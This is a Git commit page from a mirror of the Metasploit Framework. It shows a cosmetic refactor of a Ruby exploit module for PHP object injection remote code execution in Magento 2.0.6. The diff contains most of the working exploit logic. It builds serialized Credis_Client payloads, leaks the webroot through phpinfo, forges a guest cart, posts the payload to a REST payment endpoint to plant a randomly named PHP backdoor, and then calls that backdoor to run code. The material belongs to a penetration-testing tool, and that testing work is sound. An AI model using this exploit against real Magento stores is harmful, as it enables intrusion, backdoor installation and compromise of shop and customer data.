infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Cosmetic changes for magento_unserialize to pass msftidy & guidelines

bug/bundler_fix
wchen-r7 2016-06-02 16:34:41 -05:00
parent 4f42cc8c08
commit 7c9227f70b
1 changed files with 56 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

68
modules/exploits/multi/http/magento_unserialize.rb
View File

@ -13,16 +13,18 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Magento <= 2.0.6 Unserialize Remote Code Execution', 'Name' => 'Magento 2.0.6 Unserialize Remote Code Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a PHP object injection vulnerability in Magento <= 2.0.6 This module exploits a PHP object injection vulnerability in Magento 2.0.6
or prior.
}, },
'Platform' => 'php', 'Platform' => 'php',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Author' =>
[
'Netanel Rubin', # original discovery 'Netanel Rubin', # original discovery
'agix', # original exploit 'agix', # original exploit
'mr_me <mr_me@offensive-security.com>', # metasploit module 'mr_me <mr_me[at]offensive-security.com>', # metasploit module
], ],
'Payload' => 'Payload' =>
{ {
@ -36,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/'] ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
], ],
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Targets' => [ 'Targets' =>
[
[ 'Automatic Targeting', { 'auto' => true } ], [ 'Automatic Targeting', { 'auto' => true } ],
], ],
'DisclosureDate' => 'May 17 2016', 'DisclosureDate' => 'May 17 2016',
@ -48,6 +51,10 @@ class MetasploitModule < Msf::Exploit::Remote
], self.class) ], self.class)
end end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def get_phpinfo def get_phpinfo
# uses the Magento_Framework_DB_Transaction class # uses the Magento_Framework_DB_Transaction class
serialize = 'O:13:\"Credis_Client\":22:{' serialize = 'O:13:\"Credis_Client\":22:{'
@ -149,7 +156,8 @@ class MetasploitModule < Msf::Exploit::Remote
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;' serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:11:\"\u0000*\u0000requests\";' serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 'i:0;}' serialize << 'i:0;}'
return serialize
serialize
end end
def get_phpshell def get_phpshell
@ -252,14 +260,16 @@ class MetasploitModule < Msf::Exploit::Remote
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;' serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:11:\"\u0000*\u0000requests\";' serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 'i:0;}' serialize << 'i:0;}'
return serialize
serialize
end end
def do_check def do_check
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"' data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data << get_phpinfo data << get_phpinfo
data << "\"}},\"email\":\"#{@email}\"}" data << "\"}},\"email\":\"#{@email}\"}"
return send_request_cgi({
send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"), 'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'ctype' => 'application/json', 'ctype' => 'application/json',
@ -293,16 +303,19 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError => e
vprint_error(e.message)
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end end
def get_webroot def get_webroot
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"' data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data << get_phpinfo data << get_phpinfo
data << "\"}},\"email\":\"#{@email}\"}" data << "\"}},\"email\":\"#{@email}\"}"
# we steal path via phpinfo # we steal path via phpinfo
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -310,11 +323,13 @@ class MetasploitModule < Msf::Exploit::Remote
'ctype' => 'application/json', 'ctype' => 'application/json',
'data' => data, 'data' => data,
}) })
if res and res.code == 200
if res && res.code == 200
@webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/ @webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/
return true return true
end end
return false
false
end end
def create_fake_cart def create_fake_cart
@ -325,10 +340,10 @@ class MetasploitModule < Msf::Exploit::Remote
'cookie' => @cookies, 'cookie' => @cookies,
'vars_get' => { 'form_key' => @form_key } 'vars_get' => { 'form_key' => @form_key }
}) })
if (res and res.body.include?('[]'))
return true return true if (res && res.body.include?('[]'))
end
return false false
end end
def generate_cart_id def generate_cart_id
@ -337,27 +352,29 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, '/checkout/cart/'), 'uri' => normalize_uri(target_uri.path, '/checkout/cart/'),
'cookie' => @cookies, 'cookie' => @cookies,
}) })
if res and res.code == 200 if res && res.code == 200
@guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/ @guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/
return true return true
end end
return false
false
end end
def backdoor def backdoor
data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\"" data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\""
data << get_phpshell data << get_phpshell
data << "\"}},\"email\":\"#{@email}\"}" data << "\"}},\"email\":\"#{@email}\"}"
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"), 'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'ctype' => 'application/json', 'ctype' => 'application/json',
'data' => data, 'data' => data,
}) })
if (res && res.body.include?('true'))
return true return true if (res && res.body.include?('true'))
end
return false false
end end
def exec_code def exec_code
@ -366,21 +383,22 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"), 'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"),
}, timeout = 0.5) }, timeout = 0.5)
end end
def exploit def exploit
define_globals define_globals
@backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php" @backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php"
register_files_for_cleanup("#{@backdoor}") register_files_for_cleanup("#{@backdoor}")
if create_fake_cart && generate_cart_id if create_fake_cart && generate_cart_id
print_good("generated a guest cart id") print_good("generated a guest cart id")
if get_webroot if get_webroot && backdoor
if backdoor
print_good("backdoor done!") print_good("backdoor done!")
exec_code exec_code
end end
end end
end end
end
end end
=begin =begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc
[*] Processing scripts/sam.rc for ERB directives. [*] Processing scripts/sam.rc for ERB directives.